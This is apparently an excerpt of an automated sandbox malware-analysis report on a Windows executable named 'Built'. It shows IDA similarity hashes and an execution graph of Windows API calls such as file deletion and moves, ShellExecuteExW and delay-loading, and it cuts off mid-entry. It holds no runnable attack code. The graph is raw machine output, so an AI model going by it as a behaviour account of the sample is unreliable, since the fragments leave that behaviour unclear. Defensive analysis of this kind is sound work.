                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                      • Instruction ID: 8949226114a8259f1576299f90932b75b5676a27dc11c1518bacbfa968f0e0db
                                                                      • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                      • Instruction Fuzzy Hash: 7F41B122A2CA85C2DB20EF25E4543B9A761FB98794F844035EE4D87B99EF3CD441CB24
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory
                                                                      • String ID: :
                                                                      • API String ID: 1611563598-336475711
                                                                      • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                      • Instruction ID: 8ca1a9c80e806dcee256bb8820287405bc43a9e0667ecde9db04dcbb594a0856
                                                                      • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                      • Instruction Fuzzy Hash: 1B21C122A2C681C1EB60BF15D46427DE3A1FB88B44FC54035DE9C83A86EF7CE9458B75
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                      • Instruction ID: 2208e2ca89cdb8591cc6fd828f02bf8c8e24d4a21ad73fb7a40a641dd933d887
                                                                      • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                      • Instruction Fuzzy Hash: D111493662DB8582EB219B15E440269B7E0FB88B89F984234DE8D07B69EF3CC5518B10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                      • String ID: :
                                                                      • API String ID: 2595371189-336475711
                                                                      • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                      • Instruction ID: 2ca4c2416d58bd2da2ab7b83c69facbe00a37a498a66a248d97292ae586a73ec
                                                                      • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                      • Instruction Fuzzy Hash: E401212192C246C6FB20BF64A47127EA2A0EF98748FC41035DD5D86A92FE7CD544CA39

                                                                      Execution Graph

                                                                      Execution Coverage:9.6%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:4%
                                                                      Total number of Nodes:1481
                                                                      Total number of Limit Nodes:28
                                                                      execution_graph 22831 299f2f 22832 299f3d 22831->22832 22833 299f44 22831->22833 22834 299f4a GetStdHandle 22833->22834 22838 299f55 22833->22838 22834->22838 22835 299fa9 WriteFile 22835->22838 22836 299f7a 22837 299f7c WriteFile 22836->22837 22836->22838 22837->22836 22837->22838 22838->22832 22838->22835 22838->22836 22838->22837 22840 29a031 22838->22840 22842 296e18 60 API calls 22838->22842 22843 297061 75 API calls 22840->22843 22842->22838 22843->22832 24727 291025 29 API calls pre_c_initialization 24728 2aa430 73 API calls 24786 2abe49 103 API calls 4 library calls 24729 2aec0b 28 API calls 2 library calls 24788 2adb0b 19 API calls ___delayLoadHelper2@8 23103 2ac40e 23104 2ac4c7 23103->23104 23111 2ac42c _wcschr 23103->23111 23105 2ac4e5 23104->23105 23116 2abe49 _wcsrchr 23104->23116 23158 2ace22 23104->23158 23108 2ace22 18 API calls 23105->23108 23105->23116 23108->23116 23109 2aca8d 23111->23104 23112 2a17ac CompareStringW 23111->23112 23112->23111 23113 2ac11d SetWindowTextW 23113->23116 23116->23109 23116->23113 23119 2abf0b SetFileAttributesW 23116->23119 23124 2ac2e7 GetDlgItem SetWindowTextW SendMessageW 23116->23124 23127 2ac327 SendMessageW 23116->23127 23132 2a17ac CompareStringW 23116->23132 23133 2aaa36 23116->23133 23137 2a9da4 GetCurrentDirectoryW 23116->23137 23142 29a52a 7 API calls 23116->23142 23143 29a4b3 FindClose 23116->23143 23144 2aab9a 76 API calls ___std_exception_copy 23116->23144 23145 2b35de 23116->23145 23120 2abfc5 GetFileAttributesW 23119->23120 23131 2abf25 ___scrt_fastfail 23119->23131 23120->23116 23123 2abfd7 DeleteFileW 23120->23123 23123->23116 23125 2abfe8 23123->23125 23124->23116 23139 29400a 23125->23139 23127->23116 23129 2ac01d MoveFileW 23129->23116 23130 2ac035 MoveFileExW 23129->23130 23130->23116 23131->23116 23131->23120 23138 29b4f7 52 API calls 2 library calls 23131->23138 23132->23116 23134 2aaa40 23133->23134 23135 2aaaf3 ExpandEnvironmentStringsW 23134->23135 23136 2aab16 23134->23136 23135->23136 23136->23116 23137->23116 23138->23131 23181 293fdd 23139->23181 23142->23116 23143->23116 23144->23116 23146 2b8606 23145->23146 23147 2b861e 23146->23147 23148 2b8613 23146->23148 23150 2b8626 23147->23150 23156 2b862f _unexpected 23147->23156 23149 2b8518 __onexit 21 API calls 23148->23149 23154 2b861b 23149->23154 23151 2b84de _free 20 API calls 23150->23151 23151->23154 23152 2b8659 HeapReAlloc 23152->23154 23152->23156 23153 2b8634 23210 2b895a 20 API calls __dosmaperr 23153->23210 23154->23116 23156->23152 23156->23153 23211 2b71ad 7 API calls 2 library calls 23156->23211 23160 2ace2c ___scrt_fastfail 23158->23160 23159 2ad08a 23159->23105 23160->23159 23161 2acf1b 23160->23161 23215 2a17ac CompareStringW 23160->23215 23212 29a180 23161->23212 23165 2acf4f ShellExecuteExW 23165->23159 23170 2acf62 23165->23170 23167 2acf47 23167->23165 23168 2acf9b 23217 2ad2e6 6 API calls 23168->23217 23169 2acff1 CloseHandle 23171 2acfff 23169->23171 23176 2ad00a 23169->23176 23170->23168 23170->23169 23172 2acf91 ShowWindow 23170->23172 23218 2a17ac CompareStringW 23171->23218 23172->23168 23175 2ad081 ShowWindow 23175->23159 23176->23159 23176->23175 23177 2acfb3 23177->23169 23178 2acfc6 GetExitCodeProcess 23177->23178 23178->23169 23179 2acfd9 23178->23179 23179->23169 23182 293ff4 ___scrt_initialize_default_local_stdio_options 23181->23182 23185 2b5759 23182->23185 23188 2b3837 23185->23188 23189 2b385f 23188->23189 23190 2b3877 23188->23190 23205 2b895a 20 API calls __dosmaperr 23189->23205 23190->23189 23192 2b387f 23190->23192 23194 2b3dd6 __fassign 38 API calls 23192->23194 23193 2b3864 23206 2b8839 26 API calls ___std_exception_copy 23193->23206 23196 2b388f 23194->23196 23207 2b3da1 20 API calls 2 library calls 23196->23207 23198 2aec4a ___delayLoadHelper2@8 5 API calls 23200 293ffe GetFileAttributesW 23198->23200 23199 2b3907 23208 2b4186 51 API calls 4 library calls 23199->23208 23200->23125 23200->23129 23203 2b386f 23203->23198 23204 2b3912 23209 2b3e59 20 API calls _free 23204->23209 23205->23193 23206->23203 23207->23199 23208->23204 23209->23203 23210->23154 23211->23156 23219 29a194 23212->23219 23215->23161 23216 29b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23216->23167 23217->23177 23218->23176 23227 2ae360 23219->23227 23222 29a189 23222->23165 23222->23216 23223 29a1b2 23229 29b66c 23223->23229 23225 29a1c6 23225->23222 23226 29a1ca GetFileAttributesW 23225->23226 23226->23222 23228 29a1a1 GetFileAttributesW 23227->23228 23228->23222 23228->23223 23230 29b679 23229->23230 23238 29b683 23230->23238 23239 29b806 CharUpperW 23230->23239 23232 29b692 23240 29b832 CharUpperW 23232->23240 23234 29b6a1 23235 29b71c GetCurrentDirectoryW 23234->23235 23236 29b6a5 23234->23236 23235->23238 23241 29b806 CharUpperW 23236->23241 23238->23225 23239->23232 23240->23234 23241->23238 24730 2aea00 46 API calls 5 library calls 23244 2adb01 23245 2adaaa 23244->23245 23247 2adf59 23245->23247 23275 2adc67 23247->23275 23249 2adf73 23250 2adfd0 23249->23250 23263 2adff4 23249->23263 23251 2aded7 DloadReleaseSectionWriteAccess 11 API calls 23250->23251 23252 2adfdb RaiseException 23251->23252 23253 2ae1c9 23252->23253 23254 2aec4a ___delayLoadHelper2@8 5 API calls 23253->23254 23256 2ae1d8 23254->23256 23255 2ae06c LoadLibraryExA 23257 2ae07f GetLastError 23255->23257 23258 2ae0cd 23255->23258 23256->23245 23259 2ae0a8 23257->23259 23260 2ae092 23257->23260 23262 2ae0df 23258->23262 23264 2ae0d8 FreeLibrary 23258->23264 23265 2aded7 DloadReleaseSectionWriteAccess 11 API calls 23259->23265 23260->23258 23260->23259 23261 2ae13d GetProcAddress 23266 2ae14d GetLastError 23261->23266 23270 2ae19b 23261->23270 23262->23261 23262->23270 23263->23255 23263->23258 23263->23262 23263->23270 23264->23262 23267 2ae0b3 RaiseException 23265->23267 23273 2ae160 23266->23273 23267->23253 23269 2aded7 DloadReleaseSectionWriteAccess 11 API calls 23271 2ae181 RaiseException 23269->23271 23286 2aded7 23270->23286 23272 2adc67 ___delayLoadHelper2@8 11 API calls 23271->23272 23274 2ae198 23272->23274 23273->23269 23273->23270 23274->23270 23276 2adc99 23275->23276 23277 2adc73 23275->23277 23276->23249 23294 2add15 23277->23294 23280 2adc94 23304 2adc9a 23280->23304 23283 2aec4a ___delayLoadHelper2@8 5 API calls 23284 2adf55 23283->23284 23284->23249 23285 2adf24 23285->23283 23287 2adf0b 23286->23287 23288 2adee9 23286->23288 23287->23253 23289 2add15 DloadLock 8 API calls 23288->23289 23290 2adeee 23289->23290 23291 2adf06 23290->23291 23292 2ade67 DloadProtectSection 3 API calls 23290->23292 23313 2adf0f 8 API calls 2 library calls 23291->23313 23292->23291 23295 2adc9a DloadUnlock 3 API calls 23294->23295 23296 2add2a 23295->23296 23297 2aec4a ___delayLoadHelper2@8 5 API calls 23296->23297 23298 2adc78 23297->23298 23298->23280 23299 2ade67 23298->23299 23300 2ade7c DloadObtainSection 23299->23300 23301 2ade82 23300->23301 23302 2adeb7 VirtualProtect 23300->23302 23312 2add72 VirtualQuery GetSystemInfo 23300->23312 23301->23280 23302->23301 23305 2adcab 23304->23305 23306 2adca7 23304->23306 23307 2adcaf 23305->23307 23308 2adcb3 GetModuleHandleW 23305->23308 23306->23285 23307->23285 23309 2adcc9 GetProcAddress 23308->23309 23311 2adcc5 23308->23311 23310 2adcd9 GetProcAddress 23309->23310 23309->23311 23310->23311 23311->23285 23312->23302 23313->23287 24789 291f05 126 API calls __EH_prolog 24790 2abe49 108 API calls 4 library calls 24791 296110 80 API calls 24792 2bb710 GetProcessHeap 24734 2afc60 51 API calls 2 library calls 24736 2b3460 RtlUnwind 24737 2b9c60 71 API calls _free 24738 2b9e60 31 API calls 2 library calls 24225 2ad573 24226 2ad580 24225->24226 24227 29ddd1 53 API calls 24226->24227 24228 2ad594 24227->24228 24229 29400a _swprintf 51 API calls 24228->24229 24230 2ad5a6 SetDlgItemTextW 24229->24230 24231 2aac74 5 API calls 24230->24231 24232 2ad5c3 24231->24232 24740 291075 82 API calls pre_c_initialization 24741 2a5c77 121 API calls __vswprintf_c_l 24795 2ad34e DialogBoxParamW 24743 2a8c40 GetClientRect 24744 2aec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24745 2b3040 5 API calls 2 library calls 24796 2abe49 98 API calls 3 library calls 24747 2c0040 IsProcessorFeaturePresent 24243 299b59 24244 299bd7 24243->24244 24247 299b63 24243->24247 24245 299bad SetFilePointer 24245->24244 24246 299bcd GetLastError 24245->24246 24246->24244 24247->24245 24797 2a9b50 GdipDisposeImage GdipFree pre_c_initialization 24749 2b8050 8 API calls ___vcrt_uninitialize 24750 2ae4a2 38 API calls 2 library calls 24752 2996a0 79 API calls 24800 2be9a0 51 API calls 24755 2b76bd 52 API calls 3 library calls 24756 2916b0 84 API calls 22848 2b90b0 22856 2ba56f 22848->22856 22851 2b90c4 22853 2b90cc 22854 2b90d9 22853->22854 22864 2b90e0 11 API calls 22853->22864 22865 2ba458 22856->22865 22859 2ba59f 22872 2aec4a 22859->22872 22860 2ba5ae TlsAlloc 22860->22859 22862 2b90ba 22862->22851 22863 2b9029 20 API calls 2 library calls 22862->22863 22863->22853 22864->22851 22866 2ba488 22865->22866 22870 2ba484 22865->22870 22866->22859 22866->22860 22867 2ba4a8 22867->22866 22869 2ba4b4 GetProcAddress 22867->22869 22871 2ba4c4 __crt_fast_encode_pointer 22869->22871 22870->22866 22870->22867 22879 2ba4f4 22870->22879 22871->22866 22873 2aec53 22872->22873 22874 2aec55 IsProcessorFeaturePresent 22872->22874 22873->22862 22876 2af267 22874->22876 22886 2af22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22876->22886 22878 2af34a 22878->22862 22880 2ba515 LoadLibraryExW 22879->22880 22885 2ba50a 22879->22885 22881 2ba532 GetLastError 22880->22881 22884 2ba54a 22880->22884 22883 2ba53d LoadLibraryExW 22881->22883 22881->22884 22882 2ba561 FreeLibrary 22882->22885 22883->22884 22884->22882 22884->22885 22885->22870 22886->22878 22887 2ba3b0 22888 2ba3bb 22887->22888 22890 2ba3e4 22888->22890 22892 2ba3e0 22888->22892 22893 2ba6ca 22888->22893 22900 2ba410 DeleteCriticalSection 22890->22900 22894 2ba458 _unexpected 5 API calls 22893->22894 22895 2ba6f1 22894->22895 22896 2ba70f InitializeCriticalSectionAndSpinCount 22895->22896 22897 2ba6fa 22895->22897 22896->22897 22898 2aec4a ___delayLoadHelper2@8 5 API calls 22897->22898 22899 2ba726 22898->22899 22899->22888 22900->22892 24757 2b1eb0 6 API calls 4 library calls 22902 2b79b7 22913 2bb290 22902->22913 22907 2b79d4 22909 2b84de _free 20 API calls 22907->22909 22910 2b7a09 22909->22910 22911 2b79df 22930 2b84de 22911->22930 22914 2b79c9 22913->22914 22915 2bb299 22913->22915 22917 2bb610 GetEnvironmentStringsW 22914->22917 22936 2bb188 22915->22936 22918 2bb627 22917->22918 22928 2bb67a 22917->22928 22921 2bb62d WideCharToMultiByte 22918->22921 22919 2b79ce 22919->22907 22929 2b7a0f 26 API calls 3 library calls 22919->22929 22920 2bb683 FreeEnvironmentStringsW 22920->22919 22922 2bb649 22921->22922 22921->22928 22923 2b8518 __onexit 21 API calls 22922->22923 22924 2bb64f 22923->22924 22925 2bb66c 22924->22925 22926 2bb656 WideCharToMultiByte 22924->22926 22927 2b84de _free 20 API calls 22925->22927 22926->22925 22927->22928 22928->22919 22928->22920 22929->22911 22931 2b84e9 RtlFreeHeap 22930->22931 22935 2b8512 __dosmaperr 22930->22935 22932 2b84fe 22931->22932 22931->22935 23101 2b895a 20 API calls __dosmaperr 22932->23101 22934 2b8504 GetLastError 22934->22935 22935->22907 22956 2b8fa5 GetLastError 22936->22956 22938 2bb195 22977 2bb2ae 22938->22977 22940 2bb19d 22986 2baf1b 22940->22986 22943 2bb1b4 22943->22914 22946 2bb1f7 22949 2b84de _free 20 API calls 22946->22949 22949->22943 22950 2bb1f2 23010 2b895a 20 API calls __dosmaperr 22950->23010 22952 2bb23b 22952->22946 23011 2badf1 26 API calls 22952->23011 22953 2bb20f 22953->22952 22954 2b84de _free 20 API calls 22953->22954 22954->22952 22957 2b8fbb 22956->22957 22958 2b8fc7 22956->22958 23012 2ba61b 11 API calls 2 library calls 22957->23012 23013 2b85a9 20 API calls 3 library calls 22958->23013 22961 2b8fd3 22963 2b8fdb 22961->22963 23014 2ba671 11 API calls 2 library calls 22961->23014 22962 2b8fc1 22962->22958 22964 2b9010 SetLastError 22962->22964 22966 2b84de _free 20 API calls 22963->22966 22964->22938 22968 2b8fe1 22966->22968 22967 2b8ff0 22967->22963 22969 2b8ff7 22967->22969 22970 2b901c SetLastError 22968->22970 23015 2b8e16 20 API calls _unexpected 22969->23015 23016 2b8566 38 API calls _abort 22970->23016 22973 2b9002 22975 2b84de _free 20 API calls 22973->22975 22976 2b9009 22975->22976 22976->22964 22976->22970 22978 2bb2ba ___DestructExceptionObject 22977->22978 22979 2b8fa5 _unexpected 38 API calls 22978->22979 22982 2bb2c4 22979->22982 22981 2bb348 ___DestructExceptionObject 22981->22940 22982->22981 22985 2b84de _free 20 API calls 22982->22985 23017 2b8566 38 API calls _abort 22982->23017 23018 2ba3f1 EnterCriticalSection 22982->23018 23019 2bb33f LeaveCriticalSection _abort 22982->23019 22985->22982 23020 2b3dd6 22986->23020 22989 2baf4e 22991 2baf65 22989->22991 22992 2baf53 GetACP 22989->22992 22990 2baf3c GetOEMCP 22990->22991 22991->22943 22993 2b8518 22991->22993 22992->22991 22994 2b8556 22993->22994 22999 2b8526 _unexpected 22993->22999 23031 2b895a 20 API calls __dosmaperr 22994->23031 22996 2b8541 RtlAllocateHeap 22997 2b8554 22996->22997 22996->22999 22997->22946 23000 2bb350 22997->23000 22999->22994 22999->22996 23030 2b71ad 7 API calls 2 library calls 22999->23030 23001 2baf1b 40 API calls 23000->23001 23002 2bb36f 23001->23002 23005 2bb3c0 IsValidCodePage 23002->23005 23007 2bb376 23002->23007 23009 2bb3e5 ___scrt_fastfail 23002->23009 23003 2aec4a ___delayLoadHelper2@8 5 API calls 23004 2bb1ea 23003->23004 23004->22950 23004->22953 23006 2bb3d2 GetCPInfo 23005->23006 23005->23007 23006->23007 23006->23009 23007->23003 23032 2baff4 GetCPInfo 23009->23032 23010->22946 23011->22946 23012->22962 23013->22961 23014->22967 23015->22973 23018->22982 23019->22982 23021 2b3df3 23020->23021 23027 2b3de9 23020->23027 23022 2b8fa5 _unexpected 38 API calls 23021->23022 23021->23027 23023 2b3e14 23022->23023 23028 2b90fa 38 API calls __fassign 23023->23028 23025 2b3e2d 23029 2b9127 38 API calls __fassign 23025->23029 23027->22989 23027->22990 23028->23025 23029->23027 23030->22999 23031->22997 23033 2bb0d8 23032->23033 23039 2bb02e 23032->23039 23036 2aec4a ___delayLoadHelper2@8 5 API calls 23033->23036 23038 2bb184 23036->23038 23038->23007 23042 2bc099 23039->23042 23041 2ba275 __vswprintf_c_l 43 API calls 23041->23033 23043 2b3dd6 __fassign 38 API calls 23042->23043 23044 2bc0b9 MultiByteToWideChar 23043->23044 23046 2bc0f7 23044->23046 23047 2bc18f 23044->23047 23048 2bc118 __vsnwprintf_l ___scrt_fastfail 23046->23048 23051 2b8518 __onexit 21 API calls 23046->23051 23049 2aec4a ___delayLoadHelper2@8 5 API calls 23047->23049 23050 2bc189 23048->23050 23054 2bc15d MultiByteToWideChar 23048->23054 23052 2bb08f 23049->23052 23061 2ba2c0 20 API calls _free 23050->23061 23051->23048 23056 2ba275 23052->23056 23054->23050 23055 2bc179 GetStringTypeW 23054->23055 23055->23050 23057 2b3dd6 __fassign 38 API calls 23056->23057 23058 2ba288 23057->23058 23062 2ba058 23058->23062 23061->23047 23064 2ba073 __vswprintf_c_l 23062->23064 23063 2ba099 MultiByteToWideChar 23065 2ba0c3 23063->23065 23066 2ba24d 23063->23066 23064->23063 23069 2b8518 __onexit 21 API calls 23065->23069 23072 2ba0e4 __vsnwprintf_l 23065->23072 23067 2aec4a ___delayLoadHelper2@8 5 API calls 23066->23067 23068 2ba260 23067->23068 23068->23041 23069->23072 23070 2ba12d MultiByteToWideChar 23071 2ba199 23070->23071 23073 2ba146 23070->23073 23098 2ba2c0 20 API calls _free 23071->23098 23072->23070 23072->23071 23089 2ba72c 23073->23089 23077 2ba1a8 23079 2b8518 __onexit 21 API calls 23077->23079 23082 2ba1c9 __vsnwprintf_l 23077->23082 23078 2ba170 23078->23071 23080 2ba72c __vswprintf_c_l 11 API calls 23078->23080 23079->23082 23080->23071 23081 2ba23e 23097 2ba2c0 20 API calls _free 23081->23097 23082->23081 23083 2ba72c __vswprintf_c_l 11 API calls 23082->23083 23085 2ba21d 23083->23085 23085->23081 23086 2ba22c WideCharToMultiByte 23085->23086 23086->23081 23087 2ba26c 23086->23087 23099 2ba2c0 20 API calls _free 23087->23099 23090 2ba458 _unexpected 5 API calls 23089->23090 23091 2ba753 23090->23091 23094 2ba75c 23091->23094 23100 2ba7b4 10 API calls 3 library calls 23091->23100 23093 2ba79c LCMapStringW 23093->23094 23095 2aec4a ___delayLoadHelper2@8 5 API calls 23094->23095 23096 2ba15d 23095->23096 23096->23071 23096->23077 23096->23078 23097->23071 23098->23066 23099->23071 23100->23093 23101->22934 24759 2bac0e 27 API calls ___delayLoadHelper2@8 24805 2b5780 QueryPerformanceFrequency QueryPerformanceCounter 23315 291385 82 API calls 3 library calls 24761 29ea98 FreeLibrary 24762 2aa89d 78 API calls 24763 2a7090 114 API calls 24764 2acc90 70 API calls 24806 2aa990 97 API calls 24807 2a9b90 GdipCloneImage GdipAlloc 23321 2ad891 19 API calls ___delayLoadHelper2@8 24808 2b9b90 21 API calls 2 library calls 24809 2b2397 48 API calls 23322 2ad997 23323 2ad89b 23322->23323 23324 2adf59 ___delayLoadHelper2@8 19 API calls 23323->23324 23324->23323 23330 2aaee0 23331 2aaeea __EH_prolog 23330->23331 23493 29130b 23331->23493 23334 2aaf18 23335 2ab5cb 23568 2acd2e 23335->23568 23336 2aaf2c 23336->23334 23338 2aaf39 23336->23338 23339 2aafa2 23336->23339 23342 2aaf3e 23338->23342 23343 2aaf75 23338->23343 23341 2ab041 GetDlgItemTextW 23339->23341 23348 2aafbc 23339->23348 23341->23343 23349 2ab077 23341->23349 23342->23334 23354 29ddd1 53 API calls 23342->23354 23343->23334 23350 2aaf96 KiUserCallbackDispatcher 23343->23350 23344 2ab5e9 SendMessageW 23345 2ab5f7 23344->23345 23346 2ab600 SendDlgItemMessageW 23345->23346 23347 2ab611 GetDlgItem SendMessageW 23345->23347 23346->23347 23586 2a9da4 GetCurrentDirectoryW 23347->23586 23353 29ddd1 53 API calls 23348->23353 23352 2ab08f GetDlgItem 23349->23352 23365 2ab080 23349->23365 23350->23334 23356 2ab0a4 SendMessageW SendMessageW 23352->23356 23357 2ab0c5 SetFocus 23352->23357 23358 2aafde SetDlgItemTextW 23353->23358 23359 2aaf58 23354->23359 23355 2ab641 GetDlgItem 23360 2ab65e 23355->23360 23361 2ab664 SetWindowTextW 23355->23361 23356->23357 23362 2ab0d5 23357->23362 23382 2ab0ed 23357->23382 23363 2aafec 23358->23363 23608 291241 SHGetMalloc 23359->23608 23360->23361 23587 2aa2c7 GetClassNameW 23361->23587 23367 29ddd1 53 API calls 23362->23367 23363->23334 23373 2aaff9 GetMessageW 23363->23373 23365->23343 23369 2ab56b 23365->23369 23372 2ab0df 23367->23372 23368 2aaf5f 23368->23334 23374 2aaf63 SetDlgItemTextW 23368->23374 23370 29ddd1 53 API calls 23369->23370 23375 2ab57b SetDlgItemTextW 23370->23375 23609 2acb5a 23372->23609 23373->23334 23378 2ab010 IsDialogMessageW 23373->23378 23374->23334 23379 2ab58f 23375->23379 23378->23363 23381 2ab01f TranslateMessage DispatchMessageW 23378->23381 23385 29ddd1 53 API calls 23379->23385 23381->23363 23383 29ddd1 53 API calls 23382->23383 23384 2ab124 23383->23384 23387 29400a _swprintf 51 API calls 23384->23387 23388 2ab5b8 23385->23388 23386 2ab6af 23392 2ab6df 23386->23392 23393 29ddd1 53 API calls 23386->23393 23394 2ab136 23387->23394 23395 29ddd1 53 API calls 23388->23395 23389 2ab0e6 23503 29a04f 23389->23503 23391 2abdf5 98 API calls 23391->23386 23399 2abdf5 98 API calls 23392->23399 23442 2ab797 23392->23442 23397 2ab6c2 SetDlgItemTextW 23393->23397 23398 2acb5a 16 API calls 23394->23398 23395->23334 23403 29ddd1 53 API calls 23397->23403 23398->23389 23404 2ab6fa 23399->23404 23400 2ab847 23405 2ab859 23400->23405 23406 2ab850 EnableWindow 23400->23406 23401 2ab17f 23509 2aa322 SetCurrentDirectoryW 23401->23509 23402 2ab174 GetLastError 23402->23401 23409 2ab6d6 SetDlgItemTextW 23403->23409 23414 2ab70c 23404->23414 23430 2ab731 23404->23430 23410 2ab876 23405->23410 23627 2912c8 GetDlgItem EnableWindow 23405->23627 23406->23405 23408 2ab195 23411 2ab19e GetLastError 23408->23411 23412 2ab1ac 23408->23412 23409->23392 23413 2ab89d 23410->23413 23422 2ab895 SendMessageW 23410->23422 23411->23412 23421 2ab227 23412->23421 23426 2ab237 23412->23426 23427 2ab1c4 GetTickCount 23412->23427 23413->23334 23423 29ddd1 53 API calls 23413->23423 23625 2a9635 32 API calls 23414->23625 23415 2ab78a 23418 2abdf5 98 API calls 23415->23418 23417 2ab86c 23628 2912c8 GetDlgItem EnableWindow 23417->23628 23418->23442 23425 2ab46c 23421->23425 23421->23426 23422->23413 23429 2ab8b6 SetDlgItemTextW 23423->23429 23424 2ab725 23424->23430 23525 2912e6 GetDlgItem ShowWindow 23425->23525 23432 2ab24f GetModuleFileNameW 23426->23432 23433 2ab407 23426->23433 23434 29400a _swprintf 51 API calls 23427->23434 23428 2ab825 23626 2a9635 32 API calls 23428->23626 23429->23334 23430->23415 23437 2abdf5 98 API calls 23430->23437 23619 29eb3a 80 API calls 23432->23619 23433->23343 23446 29ddd1 53 API calls 23433->23446 23440 2ab1dd 23434->23440 23436 29ddd1 53 API calls 23436->23442 23443 2ab75f 23437->23443 23438 2ab47c 23526 2912e6 GetDlgItem ShowWindow 23438->23526 23510 29971e 23440->23510 23441 2ab844 23441->23400 23442->23400 23442->23428 23442->23436 23443->23415 23447 2ab768 DialogBoxParamW 23443->23447 23445 2ab275 23449 29400a _swprintf 51 API calls 23445->23449 23450 2ab41b 23446->23450 23447->23343 23447->23415 23448 2ab486 23527 29ddd1 23448->23527 23452 2ab297 CreateFileMappingW 23449->23452 23453 29400a _swprintf 51 API calls 23450->23453 23456 2ab2f9 GetCommandLineW 23452->23456 23488 2ab376 __vswprintf_c_l 23452->23488 23457 2ab439 23453->23457 23461 2ab30a 23456->23461 23470 29ddd1 53 API calls 23457->23470 23458 2ab203 23462 2ab20a GetLastError 23458->23462 23463 2ab215 23458->23463 23459 2ab381 ShellExecuteExW 23483 2ab39e 23459->23483 23620 2aab2e SHGetMalloc 23461->23620 23462->23463 23518 299653 23463->23518 23465 2ab4a2 SetDlgItemTextW GetDlgItem 23467 2ab4bf GetWindowLongW SetWindowLongW 23465->23467 23468 2ab4d7 23465->23468 23467->23468 23531 2abdf5 23468->23531 23469 2ab326 23621 2aab2e SHGetMalloc 23469->23621 23470->23343 23473 2ab332 23622 